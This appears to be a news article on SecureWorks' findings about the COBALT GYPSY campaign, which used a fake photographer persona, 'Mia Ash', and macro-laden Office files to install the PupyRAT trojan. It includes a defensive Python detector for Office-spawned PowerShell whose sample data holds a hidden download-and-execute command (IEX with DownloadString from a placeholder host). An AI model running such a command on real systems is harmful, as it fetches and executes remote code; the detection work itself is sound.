Fake female persona used to plant remote access trojans on Windows PCs

A campaign using a fake female persona to infect the Windows computers of people working in certain industries in the Middle East and North Africa with remote access trojans has been uncovered by the Counter Threat Unit of security company SecureWorks.

However, beyond the total access to their targets' computers that the trojan provided, SecureWorks offered no indication of the attackers' endgame.

The initial phishing that targeted the organisations was observed between 28 December 2016 and 1 January this year. Researchers from the company released details of their final findings today.

Messages sent as part of the phishing contained shortened URLs. Clicking one downloaded a Microsoft Word document that attempted to run a macro, which in turn ran a PowerShell command.

This resulted in the downloading of additional PowerShell scripts that loaded the remote access trojan PupyRAT onto the victim's machine. Once it was installed, the attacker had full access to the victim's system.

Asked if any particular Windows or Office vulnerability was being used to infect the victim's system, SecureWorks Counter Threat Unit senior security intelligence analyst and researcher Allison Wikoff told iTWire that in the specific instances observed by the company, PupyRAT did not use any specific flaw to install itself.

[Image] Screenshot of the Facebook page created for the fake female persona Mia Ash.

Two weeks after the initial phishing campaign, an intended victim at one of the organisations that had been targeted was contacted via LinkedIn by someone who claimed to be a London-based photographer with the name Mia Ash.

The excuse for making contact was that it was part of an exercise of reaching out to people globally. After a while, Mia Ash encouraged the target to add her as a friend on Facebook and continue communication there.

SecureWorks said that communication continued through email, WhatsApp and Facebook until 12 February when the target was sent a Microsoft Excel spreadsheet, entitled "Copy of Photography Survey.xlsm" and encouraged to open it on a work computer in order for it to function properly.

The survey contained macros that, when run, downloaded the same trojan. SecureWorks CTU said it was somewhat confident that the campaign was run by a group known as COBALT GYPSY, which has been associated with Iran in the past.
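Both delivery paths described above, the Word document sent in the phishing messages and the later Excel survey, end the same way: an Office application launches PowerShell, which fetches further scripts. The following detection logic is an added example for this article, not SecureWorks' or iTWire's code; it assumes process-creation telemetry exported as JSON lines with Sysmon-style ParentImage, Image and CommandLine fields, and the log records embedded in it are constructed.

```python
import json
import re

# Added example for this article, not SecureWorks' or iTWire's code. It assumes
# process-creation telemetry exported as JSON lines with Sysmon-style fields.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Fragments typical of a first-stage downloader: a macro-launched PowerShell
# command fetching and running further scripts from a remote host.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"\biex\b|invoke-expression|-e(?:nc(?:odedcommand)?)?\b|frombase64string|"
    r"\bhidden\b|\bbypass\b", re.IGNORECASE)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return None, "suspicious" or "high" for one process-creation event."""
    if _basename(event.get("ParentImage", "")) not in OFFICE_PARENTS:
        return None
    if _basename(event.get("Image", "")) not in SCRIPT_CHILDREN:
        return None
    # Any Office-spawned interpreter deserves a look; downloader syntax escalates it.
    return "high" if DOWNLOAD_CUES.search(event.get("CommandLine", "")) else "suspicious"

def scan(jsonl_lines):
    # Return (severity, parent, child, command_line) for every flagged event.
    hits = []
    for line in jsonl_lines:
        if not line.strip():
            continue
        event = json.loads(line)
        severity = classify(event)
        if severity:
            hits.append((severity, _basename(event["ParentImage"]),
                         _basename(event["Image"]), event.get("CommandLine", "")))
    return hits

# Constructed sample telemetry: one macro-style downloader, one Office-spawned
# cmd.exe, and two benign events that must not be flagged.
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')\""}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

On the sample the first record is rated "high" and the second "suspicious"; the explorer-parented PowerShell and the Excel print helper are ignored, which is the distinction that keeps such a rule usable on a fleet where Office legitimately spawns helpers.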

The group has, in the past, been observed targeting organisations in the telecommunications, government, defence, oil and financial services verticals based in the Mideast or North Africa through spear phishing, having identified individuals through social media sites.

[Image] Screenshot of another page from the fake profile.

But the researchers said this latest campaign was of interest because of the pains the attackers had gone to in order to build up the persona of Mia Ash. Details had been posted on LinkedIn which appeared to be taken from a genuine profile.

The same images were used for the Mia Ash persona across different social media profiles and the CTU researchers said they were more or less certain that these photos had been taken from the social media accounts of an actual Romanian photographer. This individual was very likely a student and the images were likely to have been taken from among those uploaded to sites like DeviantArt, Instagram and Facebook.

They said their analysis of a number of connections made by the Mia Ash persona showed that these fell into two main categories: photography and non-photography profiles. The photography connections had been chosen to make the persona more authentic; the non-photography connections were people from Saudi Arabia, the US, Iraq, Iran, Israel, India and Bangladesh working for technology, oil/gas, healthcare, aerospace and consulting organisations.

The latter category of connections was made up entirely of mid-level employees in technician (mechanical and computer) or project-management roles, with job titles including technical support engineer, software developer and system support.

[Image] A timeline of activity for the fake female persona.

One of the victims, whom the CTU researchers called Victim A, had social media accounts on LinkedIn, Facebook (two), a WordPress site, a Twitter account, a Blogger site and an Instagram account. This person was judged to be a strategic target and had more than 10 years of experience in the oil/gas, aviation, and telecommunications industries.

When it was pointed out by iTWire that the use of attractive women to entrap men was an old tactic that had been often used by the KGB during the Cold War, Wikoff responded that in this case it was different as images had been stolen and a fake persona created with great care.

The SecureWorks report described the approach as one that "demonstrates the creativity and persistence threat actors will employ to compromise their targets".

Justifying this description, Wikoff gave examples of the level of detail that had been gone to: Mia Ash had a favourite football team (Arsenal) and stated hobbies (photography, gym, travelling) which were listed across several of her profiles, in addition to sharing her liking for a wide range of music on Facebook.

Additionally, COBALT GYPSY kept multiple social media profiles of Mia Ash active from at least April 2016 or earlier, up to the time when a new photo was posted to her Facebook account in March 2017.

"Persistence is defined as 'the continuance in a course of action in spite of difficulty or opposition'," Wikoff said. "COBALT GYPSY wasn't successful during their first phishing campaign against a target, which is when they used Mia Ash to achieve their objectives. COBALT GYPSY was clearly determined to gain access into this targeted organisation and willing to try several strategies to do so."

Graphics: courtesy SecureWorks.
